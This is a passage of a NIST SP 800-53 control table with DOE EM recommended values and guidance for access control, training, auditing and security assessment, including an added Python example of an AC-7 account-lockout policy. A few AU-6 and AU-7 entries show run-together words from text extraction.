  NIST requirement: The organization develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: procedures to facilitate the implementation of the access control policy and associated access controls; and
  Recommended value: Security Staff and Administrative Staff

AC-1 (enhancement 0), part b.1 - Access Control Policy and Procedures
  NIST requirement: The organization reviews and updates the current access control policy [Assignment: organization-defined frequency]; and
  Recommended value: Annually or any time there is a major change
AC-1 (enhancement 0), part b.2 - Access Control Policy and Procedures
  NIST requirement: The organization reviews and updates the current access control procedures [Assignment: organization-defined frequency].
  Recommended value: Annually or any time there is a major change

AC-2 (enhancement 0), part a - Account Management
  NIST requirement: The organization identifies and selects the following types of information system accounts to support organizational missions/business functions: [Assignment: organization-defined information system account types];

AC-2 (enhancement 0), part b - Account Management
  NIST requirement: The organization assigns account managers for information system accounts;

AC-2 (enhancement 0), part c - Account Management
  NIST requirement: The organization establishes conditions for group and role membership;

AC-2 (enhancement 0), part d - Account Management
  NIST requirement: The organization specifies authorized users of the information system, group and role membership, and access authorizations (i.e., privileges) and other attributes (as required) for each account;

AC-2 (enhancement 0), part e - Account Management
  NIST requirement: The organization requires approvals by [Assignment: organization-defined personnel or roles] for requests to create information system accounts;

AC-2 (enhancement 0), part f - Account Management
  NIST requirement: The organization creates, enables, modifies, disables, and removes information system accounts in accordance with [Assignment: organization-defined procedures or conditions];

AC-2 (enhancement 0), part g - Account Management
  NIST requirement: The organization monitors the use of information system accounts;
AC-2 h.1  Account Management
  NIST requirement: The organization notifies account managers when accounts are no longer required;

AC-2 h.2  Account Management
  NIST requirement: The organization notifies account managers when users are terminated or transferred; and

AC-2 h.3  Account Management
  NIST requirement: The organization notifies account managers when individual information system usage or need-to-know changes;

AC-2 i.1  Account Management
  NIST requirement: The organization authorizes access to the information system based on a valid access authorization;

AC-2 i.2  Account Management
  NIST requirement: The organization authorizes access to the information system based on intended system usage; and

AC-2 i.3  Account Management
  NIST requirement: The organization authorizes access to the information system based on other attributes as required by the organization or associated missions/business functions;

AC-2 j  Account Management
  NIST requirement: The organization reviews accounts for compliance with account management requirements [Assignment: organization-defined frequency]; and
  Recommended value: Every 90 days

AC-2 k  Account Management
  NIST requirement: The organization establishes a process for reissuing shared/group account credentials (if deployed) when individuals are removed from the group.

AC-2(1)  Account Management | Automated System Account Management
  NIST requirement: The organization employs automated mechanisms to support the management of information system accounts.
AC-2(2)  Account Management | Removal of Temporary/Emergency Accounts
  NIST requirement: The information system automatically [Selection: removes; disables] temporary and emergency accounts after [Assignment: organization-defined time period for each type of account].
  Recommended value: Disabled immediately at the conclusion of the activity that required the account, but not longer than after 30 days

AC-2(3)  Account Management | Disable Inactive Accounts
  NIST requirement: The information system automatically disables inactive accounts after [Assignment: organization-defined time period].
  Recommended value: Immediately at the conclusion of the activity that required the account, and not longer than after 30 days

AC-2(4)  Account Management | Automated Audit Actions
  NIST requirement: The information system automatically audits account creation, modification, enabling, disabling, and removal actions, and notifies [Assignment: organization-defined personnel or roles].

AC-3  Access Enforcement
  NIST requirement: The information system enforces approved authorizations for logical access to information and system resources in accordance with applicable access control policies.
AC-4  Information Flow Enforcement
  NIST requirement: The information system enforces approved authorizations for controlling the flow of information within the system and between interconnected systems based on [Assignment: organization-defined information flow control policies].
  EM guidance: Information flow control regulates where information is allowed to travel within an information system and between information systems (as opposed to who is allowed to access the information) and without explicit regard to subsequent accesses to that information. A few examples of flow control restrictions include: keeping export-controlled information from being transmitted in the clear to the Internet, blocking outside traffic that claims to be from within the organization, and not passing any web requests to the Internet that are not from the internal web proxy. Information flow control policies and enforcement mechanisms are commonly employed by organizations to control the flow of information between designated sources and destinations (e.g., networks, individuals, devices) within information systems and between interconnected systems.
AC-5 a  Separation of Duties
  NIST requirement: The organization separates [Assignment: organization-defined duties of individuals];
  EM guidance: Examples of separation of duties include: (i) mission functions and distinct information system support functions are divided among different individuals/roles; (ii) different individuals perform information system support functions (e.g., system management, systems programming, configuration management, quality assurance and testing, network security); (iii) security personnel who administer access control functions do not administer audit functions; and (iv) different administrator accounts for different roles.

AC-5 b  Separation of Duties
  NIST requirement: The organization documents separation of duties of individuals; and

AC-5 c  Separation of Duties
  NIST requirement: The organization defines information system access authorizations to support separation of duties.

AC-6  Least Privilege
  NIST requirement: The organization employs the principle of least privilege, allowing only authorized accesses for users (or processes acting on behalf of users) which are necessary to accomplish assigned tasks in accordance with organizational missions and business functions.
  Recommended value (privileged roles to be kept distinct): System admin (root); System admin (limited); Network admin (firewalls, routers, etc.); Security admin (monitoring tools); Physical access admin (NSS); Removable media admin (NSS)
  EM guidance: No single individual, or pair of individuals, should hold logical or physical access to key system components such that their actions would be undetectable by others.

AC-6(1)  Least Privilege | Authorize Access to Security Functions
  NIST requirement: The organization explicitly authorizes access to [Assignment: organization-defined security functions (deployed in hardware, software, and firmware) and security-relevant information].
  Recommended value: Security functions: (a) access to any security-related device configuration options; or (b) configuration items set and controlled by network or system defined criteria
AC-6(2)  Least Privilege | Non-Privileged Access for Non-Security Functions
  NIST requirement: The organization requires that users of information system accounts, or roles, with access to [Assignment: organization-defined security functions or security-relevant information], use non-privileged accounts or roles when accessing non-security functions.
  Recommended value: Security functions: (a) access to any security-related device configuration options; or (b) configuration items set and controlled by network or system defined criteria

AC-6(5)  Least Privilege | Privileged Accounts
  NIST requirement: The organization restricts privileged accounts on the information system to [Assignment: organization-defined personnel or roles].

AC-6(9)  Least Privilege | Auditing Use of Privileged Functions
  NIST requirement: The information system audits the execution of privileged functions.

AC-6(10)  Least Privilege | Prohibit Non-Privileged Users from Executing Privileged Functions
  NIST requirement: The information system prevents non-privileged users from executing privileged functions, to include disabling, circumventing, or altering implemented security safeguards/countermeasures.

AC-7 a  Unsuccessful Login Attempts
  NIST requirement: The information system enforces a limit of [Assignment: organization-defined number] consecutive invalid logon attempts by a user during a [Assignment: organization-defined time period]; and
  Recommended value: 3 attempts within 1 hour
AC-7 b  Unsuccessful Login Attempts
  NIST requirement: The information system automatically [Selection: locks the account/node for an [Assignment: organization-defined time period]; locks the account/node until released by an administrator; delays next logon prompt according to [Assignment: organization-defined delay algorithm]] when the maximum number of unsuccessful attempts is exceeded.
  Recommended value: Until released by an administrator
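The AC-7 recommended values (3 consecutive invalid attempts within 1 hour; lock until released by an administrator) expressed as a small lockout tracker. This is an added example for this page, not code from the DOE EM RMAIP or from NIST; the account names, timestamps and in-memory state store are constructed. It also exercises the two behaviours the control text implies but does not spell out: a successful logon ends the run of consecutive failures, and a locked account is never released by the passage of time, only by an administrator.

```python
"""AC-7 Unsuccessful Logon Attempts: lockout tracker using the recommended
values from the table above (3 consecutive invalid attempts within 1 hour;
lock until released by an administrator).

Added example for this page, not DOE EM RMAIP or NIST code. Account names,
timestamps and the in-memory state store are constructed for illustration.
"""
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

MAX_ATTEMPTS = 3              # AC-7 a: organization-defined number (3)
WINDOW = timedelta(hours=1)   # AC-7 a: organization-defined time period (1 hour)


@dataclass
class AccountState:
    failures: list = field(default_factory=list)  # times of the current run of failures
    locked: bool = False                          # AC-7 b: stays True until admin_unlock()


class LockoutPolicy:
    def __init__(self, max_attempts: int = MAX_ATTEMPTS, window: timedelta = WINDOW):
        self.max_attempts = max_attempts
        self.window = window
        self._accounts = {}   # user -> AccountState (constructed in-memory store)

    def _state(self, user: str) -> AccountState:
        return self._accounts.setdefault(user, AccountState())

    def record_attempt(self, user: str, success: bool, at: datetime) -> str:
        """Evaluate one logon attempt; returns 'allowed', 'denied' or 'locked'."""
        st = self._state(user)
        if st.locked:
            # AC-7 b, "until released by an administrator": a correct password
            # and the passage of time both leave the lock in place.
            return "locked"
        if success:
            st.failures.clear()   # a success ends the run of *consecutive* failures
            return "allowed"
        # Only failures inside the 1-hour window count toward the limit.
        st.failures = [t for t in st.failures if at - t < self.window]
        st.failures.append(at)
        if len(st.failures) >= self.max_attempts:
            st.locked = True
            st.failures.clear()
            return "locked"
        return "denied"

    def admin_unlock(self, user: str) -> None:
        """Administrator release; the only path out of the locked state."""
        st = self._state(user)
        st.locked = False
        st.failures.clear()

    def is_locked(self, user: str) -> bool:
        return self._state(user).locked


def demo() -> list:
    """Walk two constructed accounts through the policy; returns the decisions."""
    p = LockoutPolicy()
    t0 = datetime(2024, 1, 1, 9, 0, tzinfo=timezone.utc)

    def m(minutes: int) -> datetime:
        return t0 + timedelta(minutes=minutes)

    out = [
        p.record_attempt("alice", False, m(0)),    # denied  (1 of 3)
        p.record_attempt("alice", False, m(10)),   # denied  (2 of 3)
        p.record_attempt("alice", True,  m(20)),   # allowed, run reset
        p.record_attempt("alice", False, m(30)),   # denied  (1 of 3)
        p.record_attempt("alice", False, m(40)),   # denied  (2 of 3)
        p.record_attempt("alice", False, m(50)),   # locked  (3rd within 1 h)
        p.record_attempt("alice", True,  m(300)),  # locked: hours later, still locked
    ]
    p.admin_unlock("alice")
    out.append(p.record_attempt("alice", True, m(360)))   # allowed after release
    # bob: the first failure ages out of the window before the third arrives
    out.append(p.record_attempt("bob", False, m(0)))      # denied (1)
    out.append(p.record_attempt("bob", False, m(5)))      # denied (2)
    out.append(p.record_attempt("bob", False, m(62)))     # denied: only 2 inside the last hour
    return out


if __name__ == "__main__":
    for decision in demo():
        print(decision)
```

One caveat a practitioner will want: the "until released by an administrator" option turns a password-spraying attacker into a denial-of-service source for every account name they can guess, so the lock events should also be fed to the AC-2(4) account-action audit and notification path so that a burst of lockouts is seen and handled rather than silently queued for the help desk.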
AC-8 a.1  System Use Notification
  NIST requirement: The information system displays to users [Assignment: organization-defined system use notification message or banner] before granting access to the system that provides privacy and security notices consistent with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance and states that: users are accessing a U.S. Government information system;

AC-8 a.2  System Use Notification
  NIST requirement: The information system displays to users [Assignment: organization-defined system use notification message or banner] before granting access to the system that provides privacy and security notices consistent with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance and states that: information system usage may be monitored, recorded, and subject to audit;
  Recommended value: DOE approved banner
AC-8 a.3  System Use Notification
  NIST requirement: The information system displays to users [Assignment: organization-defined system use notification message or banner] before granting access to the system that provides privacy and security notices consistent with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance and states that: unauthorized use of the information system is prohibited and subject to criminal and civil penalties; and

AC-8 a.4  System Use Notification
  NIST requirement: The information system displays to users [Assignment: organization-defined system use notification message or banner] before granting access to the system that provides privacy and security notices consistent with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance and states that: use of the information system indicates consent to monitoring and recording;

AC-8 b  System Use Notification
  NIST requirement: The information system retains the notification message or banner on the screen until users acknowledge the usage conditions and take explicit actions to log on to or further access the information system; and
AC-8 c.1  System Use Notification
  NIST requirement: The information system, for publicly accessible systems: displays system use information [Assignment: organization-defined conditions], before granting further access;

AC-8 c.2  System Use Notification
  NIST requirement: The information system, for publicly accessible systems: displays references, if any, to monitoring, recording, or auditing that are consistent with privacy accommodations for such systems that generally prohibit those activities; and

AC-8 c.3  System Use Notification
  NIST requirement: The information system, for publicly accessible systems: includes a description of the authorized uses of the system.

AC-11 a  Session Lock
  NIST requirement: The information system prevents further access to the system by initiating a session lock after [Assignment: organization-defined time period] of inactivity or upon receiving a request from a user; and
  Recommended value: 15 minutes

AC-11 b  Session Lock
  NIST requirement: The information system retains the session lock until the user reestablishes access using established identification and authentication procedures.

AC-11(1)  Session Lock | Pattern-Hiding Displays
  NIST requirement: The information system conceals, via the session lock, information previously visible on the display with a publicly viewable image.

AC-12  Session Termination
  NIST requirement: The information system automatically terminates a user session after [Assignment: organization-defined conditions or trigger events requiring session disconnect].
AC-14 a  Permitted Actions without Identification or Authentication
  NIST requirement: The organization identifies [Assignment: organization-defined user actions] that can be performed on the information system without identification or authentication consistent with organizational missions/business functions; and

AC-14 b  Permitted Actions without Identification or Authentication
  NIST requirement: The organization documents and provides supporting rationale in the security plan for the information system for user actions not requiring identification and authentication.

AC-17 a  Remote Access
  NIST requirement: The organization establishes and documents usage restrictions, configuration/connection requirements, and implementation guidance for each type of remote access allowed; and

AC-17 b  Remote Access
  NIST requirement: The organization authorizes remote access to the information system prior to allowing such connections.

AC-17(1)  Remote Access | Automated Monitoring/Control
  NIST requirement: The information system monitors and controls remote access methods.

AC-17(2)  Remote Access | Protection of Confidentiality/Integrity Using Encryption
  NIST requirement: The information system implements cryptographic mechanisms to protect the confidentiality and integrity of remote access sessions.

AC-17(3)  Remote Access | Managed Access Control Points
  NIST requirement: The information system routes all remote accesses through [Assignment: organization-defined number] managed network access control points.
AC-17(4)(a)  Remote Access | Privileged Commands/Access
  NIST requirement: The organization authorizes the execution of privileged commands and access to security-relevant information via remote access only for [Assignment: organization-defined needs]; and
  Recommended value: Authorized privileged users performing time-sensitive or emergency activities

AC-17(4)(b)  Remote Access | Privileged Commands/Access
  NIST requirement: The organization documents the rationale for such access in the security plan for the information system.

AC-18 a  Wireless Access
  NIST requirement: The organization establishes usage restrictions, configuration/connection requirements, and implementation guidance for wireless access; and
  EM guidance: Wireless technologies include, but are not limited to, microwave, satellite, packet radio (UHF/VHF), 802.11x, and Bluetooth.

AC-18 b  Wireless Access
  NIST requirement: The organization authorizes wireless access to the information system prior to allowing such connections.

AC-18(1)  Wireless Access | Authentication and Encryption
  NIST requirement: The information system protects wireless access to the system using authentication of [Selection (one or more): users; devices] and encryption.

AC-19 a  Access Control for Mobile Devices
  NIST requirement: The organization establishes usage restrictions, configuration requirements, connection requirements, and implementation guidance for organization-controlled mobile devices; and
  EM guidance: Mobile devices include portable storage media (e.g., USB memory sticks, external hard disk drives) and portable computing and communications devices with information storage capability (e.g., notebook/laptop computers, personal digital assistants, cellular telephones, digital cameras, and audio recording devices).

AC-19 b  Access Control for Mobile Devices
  NIST requirement: The organization authorizes the connection of mobile devices to organizational information systems.
AC-19(5)  Access Control for Mobile Devices | Full Device/Container-Based Encryption
  NIST requirement: The organization employs [Selection: full-device encryption; container encryption] to protect the confidentiality and integrity of information on [Assignment: organization-defined mobile devices].
  Recommended value: Full disk encryption on laptops and on external or removable hard drives that are not physically secured

AC-20 a  Use of External Information Systems
  NIST requirement: The organization establishes terms and conditions, consistent with any trust relationships established with other organizations owning, operating, and/or maintaining external information systems, allowing authorized individuals to: access the information system from the external information systems; and
  EM guidance: External information systems are information systems or components of information systems that are outside of the authorization boundary established by the organization and for which the organization typically has no direct supervision and authority over the application of required security controls or the assessment of security control effectiveness.

AC-20 b  Use of External Information Systems
  NIST requirement: The organization establishes terms and conditions, consistent with any trust relationships established with other organizations owning, operating, and/or maintaining external information systems, allowing authorized individuals to: process, store, and/or transmit organization-controlled information using the external information systems.
AC-20(1)(a)  Use of External Information Systems | Limits on Authorized Use
  NIST requirement: The organization permits authorized individuals to use an external information system to access the information system or to process, store, or transmit organization-controlled information only when the organization: verifies the implementation of required security controls on the external system as specified in the organization's information security policy and security plan; or

AC-20(1)(b)  Use of External Information Systems | Limits on Authorized Use
  NIST requirement: The organization permits authorized individuals to use an external information system to access the information system or to process, store, or transmit organization-controlled information only when the organization: retains approved information system connection or processing agreements with the organizational entity hosting the external information system.

AC-20(2)  Use of External Information Systems | Portable Storage Devices
  NIST requirement: The organization [Selection: restricts; prohibits] the use of organization-controlled portable storage devices by authorized individuals on external information systems.

AC-22 a  Publicly Accessible Content
  NIST requirement: The organization designates individuals authorized to post information onto a publicly accessible information system;

AC-22 b  Publicly Accessible Content
  NIST requirement: The organization trains authorized individuals to ensure that publicly accessible information does not contain nonpublic information;
AC-22 c  Publicly Accessible Content
  NIST requirement: The organization reviews the proposed content of information prior to posting onto the publicly accessible information system to ensure that nonpublic information is not included; and

AC-22 d  Publicly Accessible Content
  NIST requirement: The organization reviews the content on the publicly accessible information system for nonpublic information [Assignment: organization-defined frequency] and removes such information, if discovered.
  Recommended value: Monthly

AT-1 a.1  Security Awareness and Training Policy and Procedures
  NIST requirement: The organization develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: a security awareness and training policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and
  Recommended value: Security Staff and Administrative Staff

AT-1 a.2  Security Awareness and Training Policy and Procedures
  NIST requirement: The organization develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: procedures to facilitate the implementation of the security awareness and training policy and associated security awareness and training controls; and
  Recommended value: Security Staff and Administrative Staff

AT-1 b.1  Security Awareness and Training Policy and Procedures
  NIST requirement: The organization reviews and updates the current security awareness and training policy [Assignment: organization-defined frequency]; and
  Recommended value: Annually or any time there is a major change
AT-1 b.2  Security Awareness and Training Policy and Procedures
  NIST requirement: The organization reviews and updates the current security awareness and training procedures [Assignment: organization-defined frequency].
  Recommended value: Annually or any time there is a major change

AT-2 a  Security Awareness Training
  NIST requirement: The organization provides basic security awareness training to information system users (including managers, senior executives, and contractors): as part of initial training for new users;

AT-2 b  Security Awareness Training
  NIST requirement: The organization provides basic security awareness training to information system users (including managers, senior executives, and contractors): when required by information system changes; and

AT-2 c  Security Awareness Training
  NIST requirement: The organization provides basic security awareness training to information system users (including managers, senior executives, and contractors): [Assignment: organization-defined frequency] thereafter.
  Recommended value: Annually

AT-2(2)  Security Awareness Training | Insider Threat
  NIST requirement: The organization includes security awareness training on recognizing and reporting potential indicators of insider threat.

AT-3 a  Role-Based Security Training
  NIST requirement: The organization provides role-based security training to personnel with assigned security roles and responsibilities: before authorizing access to the information system or performing assigned duties;
AT-3 b  Role-Based Security Training
  NIST requirement: The organization provides role-based security training to personnel with assigned security roles and responsibilities: when required by information system changes; and

AT-3 c  Role-Based Security Training
  NIST requirement: The organization provides role-based security training to personnel with assigned security roles and responsibilities: [Assignment: organization-defined frequency] thereafter.
  Recommended value: Annually

AT-4 a  Security Training Records
  NIST requirement: The organization documents and monitors individual information system security training activities, including basic security awareness training and specific information system security training; and

AT-4 b  Security Training Records
  NIST requirement: The organization retains individual training records for [Assignment: organization-defined time period].
  Recommended value: Retains individual training records for at least five years or until superseded or obsolete, whichever is sooner

AU-1 a.1  Audit and Accountability Policy and Procedures
  NIST requirement: The organization develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: an audit and accountability policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and
  Recommended value: Security Staff and Administrative Staff
AU-1 a.2  Audit and Accountability Policy and Procedures
  NIST requirement: The organization develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: procedures to facilitate the implementation of the audit and accountability policy and associated audit and accountability controls; and
  Recommended value: Security Staff and Administrative Staff

AU-1 b.1  Audit and Accountability Policy and Procedures
  NIST requirement: The organization reviews and updates the current audit and accountability policy [Assignment: organization-defined frequency]; and
  Recommended value: Annually or any time there is a major change

AU-1 b.2  Audit and Accountability Policy and Procedures
  NIST requirement: The organization reviews and updates the current audit and accountability procedures [Assignment: organization-defined frequency].
  Recommended value: Annually or any time there is a major change

AU-2 a  Audit Events
  NIST requirement: The organization determines that the information system is capable of auditing the following events: [Assignment: organization-defined auditable events];
  Recommended value: Successful and unsuccessful logon events to the network or any device; logoff events; change of password; startup, reboot, and any system command event; all actions by system administrator accounts; startup and shutdown of the audit function; clearing of any log file; successful and unsuccessful changes to user/group accounts and permissions; successful and unsuccessful changes to the configuration of the auditing subsystem; successful and unsuccessful changes to the configuration or policy of any device
  EM guidance: The purpose of this control is for the organization to identify the events that need to be auditable as significant and relevant to the security of the information system, giving an overall system requirement in order to meet ongoing and specific audit needs. To balance auditing requirements with other information system needs, this control also requires identifying the subset of auditable events that are to be audited at a given point in time.
AU-2 b  Audit Events
  NIST requirement: The organization coordinates the security audit function with other organizational entities requiring audit-related information to enhance mutual support and to help guide the selection of auditable events;

AU-2 c  Audit Events
  NIST requirement: The organization provides a rationale for why the auditable events are deemed to be adequate to support after-the-fact investigations of security incidents; and

AU-2 d  Audit Events
  NIST requirement: The organization determines that the following events are to be audited within the information system: [Assignment: organization-defined audited events (the subset of the auditable events defined in AU-2 a.) along with the frequency of (or situation requiring) auditing for each identified event].
  Recommended value: Successful and unsuccessful logon events to the network or any device; logoff events; change of password; startup, reboot, and any system command event; all actions by system administrator accounts; startup and shutdown of the audit function; clearing of any log file; successful and unsuccessful changes to user/group accounts and permissions; successful and unsuccessful changes to the configuration of the auditing subsystem; successful and unsuccessful changes to the configuration or policy of any device

AU-2(3)  Audit Events | Reviews and Updates
  NIST requirement: The organization reviews and updates the audited events [Assignment: organization-defined frequency].
  Recommended value: Annually
AU-3  Content of Audit Records
  NIST requirement: The information system generates audit records containing information that establishes what type of event occurred, when the event occurred, where the event occurred, the source of the event, the outcome of the event, and the identity of any individuals or subjects associated with the event.
  EM guidance: Audit record content that may be necessary to satisfy the requirement of this control includes, for example, time stamps, source and destination addresses, user/process identifiers, event descriptions, success/fail indications, filenames involved, and access control or flow control rules invoked.

AU-3(1)  Content of Audit Records | Additional Audit Information
  NIST requirement: The information system generates audit records containing the following additional information: [Assignment: organization-defined additional, more detailed information].
  Recommended value: Any technically feasible, risk-based audit information

AU-4  Audit Storage Capacity
  NIST requirement: The organization allocates audit record storage capacity in accordance with [Assignment: organization-defined audit record storage requirements].

AU-5 a  Response to Audit Processing Failures
  NIST requirement: The information system alerts [Assignment: organization-defined personnel or roles] in the event of an audit processing failure; and
  EM guidance: Audit processing failures include, for example, software/hardware errors, failures in the audit capturing mechanisms, and audit storage capacity being reached or exceeded.

AU-5 b  Response to Audit Processing Failures
  NIST requirement: The information system takes the following additional actions: [Assignment: organization-defined actions to be taken (e.g., shut down information system, overwrite oldest audit records, stop generating audit records)].
  Recommended value: As defined in the incident response plan, based upon the assessed risks to the information stored, processed and transferred by the information system technology/components
  EM guidance: Audit logs should be automatically forwarded to a log correlation or SIEM solution, both to prevent intentional destruction of audit logs and to allow options such as overwriting the oldest audit records.

AU-6 a  Audit Review, Analysis, and Reporting
  NIST requirement: The organization reviews and analyzes information system audit records [Assignment: organization-defined frequency] for indications of [Assignment: organization-defined inappropriate or unusual activity]; and
  Recommended value: Weekly
AU-6
0 bAudit Review,Analysis, and
Reporting
The organization: Reportsfindings to [Assignment:organization-definedpersonnel or roles].
AU-6
1Audit Review,Analysis and
Reporting
The organization employsautomated mechanisms tointegrate audit review,analysis, and reportingprocesses to supportorganizational processes forinvestigation and responseto suspicious activities.
AU-6
3Audit Review,Analysis and
Reporting
The organization analyzesand correlates audit recordsacross different repositoriesto gain organization-widesituational awareness.
AU-7
0 aAudit Reduction andReport Generation
The information systemprovides an audit reductionand report generationcapability that: Supports on-demand audit review,analysis, and reportingrequirements and after-the-fact investigations ofsecurity incidents; and
An audit reduction and reportgeneration capabilityprovides support for nearreal-time audit review,analysis, and reportingrequirements described inAU-6 and after-the factinvestigations of securityincidents. Audit reductionand reporting tools do notalter original audit records. Itis also a safeguard for leastprivilege to help protectagainst insider threat.
AU-7
0 bAudit Reduction andReport Generation
The information systemprovides an audit reductionand report generationcapability that: Does notalter the original content ortime ordering of auditrecords.
AU-7
1Audit Reduction andReport Generation
The information systemprovides the capability toprocess audit records forevents of interest based on[Assignment: organization-defined audit fields withinaudit records].
AU-8 a. Time Stamps
  NIST requirement: The information system: Uses internal system clocks to generate time stamps for audit records; and
AU-8 b. Time Stamps
  NIST requirement: The information system: Records time stamps for audit records that can be mapped to Coordinated Universal Time (UTC) or Greenwich Mean Time (GMT) and meets [Assignment: organization-defined granularity of time measurement].

AU-8(1)(a) Time Stamps
  NIST requirement: The information system: Compares the internal information system clocks [Assignment: organization-defined frequency] with [Assignment: organization-defined authoritative time source]; and
  Recommended value: Daily & time.doe.gov

AU-8(1)(b) Time Stamps
  NIST requirement: The information system: Synchronizes the internal system clocks to the authoritative time source when the time difference is greater than [Assignment: organization-defined time period].
  Recommended value: Two minutes
  EM supplemental guidance: A time frequency such as weekly or monthly may be used in lieu of a defined time period.

AU-9 Protection of Audit Information
  NIST requirement: The information system protects audit information and audit tools from unauthorized access, modification, and deletion.

AU-9(4) Protection of Audit Information
  NIST requirement: The organization authorizes access to management of audit functionality to only [Assignment: organization-defined subset of privileged users].
AU-11 Audit Record Retention
  NIST requirement: The organization retains audit records for [Assignment: organization-defined time period consistent with records retention policy] to provide support for after-the-fact investigations of security incidents and to meet regulatory and organizational information retention requirements.
  Recommended value: At least one year or until no longer needed for legal, investigative, or evidence purposes
  EM supplemental guidance: The organization retains audit records until it is determined that they are no longer needed for administrative, legal, audit, or other operational purposes. This includes, for example, retention and availability of audit records relative to Freedom of Information Act (FOIA) requests, subpoena, and law enforcement actions. Standard categorizations of audit records relative to such types of actions and standard response processes for each type of action are developed and disseminated. The National Archives and Records Administration (NARA) General Records Schedules (GRS) provide federal policy on record retention.

AU-12 a. Audit Generation
  NIST requirement: The information system: Provides audit record generation capability for the auditable events defined in AU-2 a. at [Assignment: organization-defined information system components];
  Recommended value: System components that access any security-related devices, including devices with network defined and controlled by network or system defined criteria

AU-12 b. Audit Generation
  NIST requirement: The information system: Allows [Assignment: organization-defined personnel or roles] to select which auditable events are to be audited by specific components of the information system; and

AU-12 c. Audit Generation
  NIST requirement: The information system: Generates audit records for the events defined in AU-2 d. with the content defined in AU-3.
CA-1 a.1. Security Assessment and Authorization Policies and Procedures
  NIST requirement: The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: A security assessment and authorization policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and
  Recommended value: Security Staff and Administrative Staff

CA-1 a.2. Security Assessment and Authorization Policies and Procedures
  NIST requirement: The organization: Develops, documents, and disseminates to [Assignment: organization-defined personnel or roles]: Procedures to facilitate the implementation of the security assessment and authorization policy and associated security assessment and authorization controls; and
  Recommended value: Security Staff and Administrative Staff

CA-1 b.1. Security Assessment and Authorization Policies and Procedures
  NIST requirement: Reviews and updates the current: Security assessment and authorization policy [Assignment: organization-defined frequency]; and
  Recommended value: Annually or any time there is a major change

CA-1 b.2. Security Assessment and Authorization Policies and Procedures
  NIST requirement: Reviews and updates the current: Security assessment and authorization procedures [Assignment: organization-defined frequency].
  Recommended value: Annually or any time there is a major change

CA-2 a.1. Security Assessments
  NIST requirement: The organization develops a security assessment plan that describes the scope of the assessment including: Security controls and control enhancements under assessment;

CA-2 a.2. Security Assessments
  NIST requirement: Assessment procedures to be used to determine security control effectiveness; and
CA-2 a.3. Security Assessments
  NIST requirement: Assessment environment, assessment team, and assessment roles and responsibilities;

CA-2 b. Security Assessments
  NIST requirement: Assesses the security controls in the information system [Assignment: organization-defined frequency] to determine the extent to which the controls are implemented correctly, operating as intended, and producing the desired outcome with respect to meeting the security requirements for the system;
  Recommended value: The site performs an initial ST&E to authorize new boundaries, performs annual continuous monitoring assessments and re-issues authorization annually or at least every three years (maximum) if appropriate
  EM supplemental guidance: Continuous monitoring is a combination of efforts: the testing of 1/3 of the controls by EM HQ, site assessments of site determined controls, site and enterprise security monitoring tools, phishing exercises and penetration testing efforts.

CA-2 c. Security Assessments
  NIST requirement: Produces a security assessment report that documents the results of the assessment; and

CA-2 d. Security Assessments
  NIST requirement: Provides the results of the security control assessment, in writing, to [Assignment: organization-defined individuals or roles].

CA-2(1) Security Assessments
  NIST requirement: The organization employs an independent assessor or assessment team with [Assignment: organization-defined level of independence] to conduct security control assessments.
  EM supplemental guidance: EM HQ provides this service to EM sites.

CA-3 a. Information System Connections
  NIST requirement: The organization: Authorizes connections from the information system to other information systems through the use of Interconnection Security Agreements;
  EM supplemental guidance: This control applies to dedicated connections between information systems and does not apply to transitory, user-controlled connections such as email and website browsing.

CA-3 b. Information System Connections
  NIST requirement: The organization: Documents, for each connection, the interface characteristics, security requirements, and the nature of the information communicated; and
CA-3 c. Information System Connections
  NIST requirement: The organization: Reviews and updates Interconnection Security Agreements [Assignment: organization-defined frequency].
  Recommended value: At least annually or when changes are made to any interface controls documented in the agreement.

CA-3(5) Information System Connections
  NIST requirement: The organization employs [Selection: allow-all, deny-by-exception; deny-all, permit-by-exception] policy for allowing [Assignment: organization-defined information systems] to connect to external information systems.

CA-5 a. Plan of Action and Milestones
  NIST requirement: The organization: Develops a plan of action and milestones for the information system to document the organization's planned remedial actions to correct weaknesses or deficiencies noted during the assessment of the security controls and to reduce or eliminate known vulnerabilities in the system; and
  EM supplemental guidance: Actions that will take significant resources and will take 90 days or more will be documented in a POA&M within eGovRPM.

CA-5 b. Plan of Action and Milestones
  NIST requirement: The organization: Updates existing plan of action and milestones [Assignment: organization-defined frequency] based on the findings from security controls assessments, security impact analyses, and continuous monitoring activities.
  Recommended value: Quarterly

CA-6 a. Security Authorization
  NIST requirement: The organization: Assigns a senior-level executive or manager to the role of authorizing official for the information system;

CA-6 b. Security Authorization
  NIST requirement: The organization: Ensures that the authorizing official authorizes the information system for processing before commencing operations; and
CA-6 c. Security Authorization
  NIST requirement: The organization: Updates the security authorization [Assignment: organization-defined frequency].
  Recommended value: The site may either update the authorization on a yearly basis (based on Continuous Monitoring assessments) or every three years.

CA-7 a. Continuous Monitoring
  NIST requirement: The organization establishes a continuous monitoring strategy and implements a continuous monitoring program that includes: Establishment of [Assignment: organization-defined metrics] to be monitored;
  EM supplemental guidance: A continuous monitoring program allows an organization to maintain the security authorization of an information system over time in a highly dynamic environment of operation with changing threats, vulnerabilities, technologies, and missions/business processes. EM HQ assists with this as a service to all EM Sites. Program level metrics have been developed and are available via the EM Portal.

CA-7 b. Continuous Monitoring
  NIST requirement: Establishment of [Assignment: organization-defined frequencies] for monitoring and [Assignment: organization-defined frequencies] for assessments supporting such monitoring;

CA-7 c. Continuous Monitoring
  NIST requirement: Ongoing security control assessments in accordance with the organizational continuous monitoring strategy; and

CA-7 d. Continuous Monitoring
  NIST requirement: Ongoing security status monitoring of organization-defined metrics in accordance with the organizational continuous monitoring strategy;

CA-7 e. Continuous Monitoring
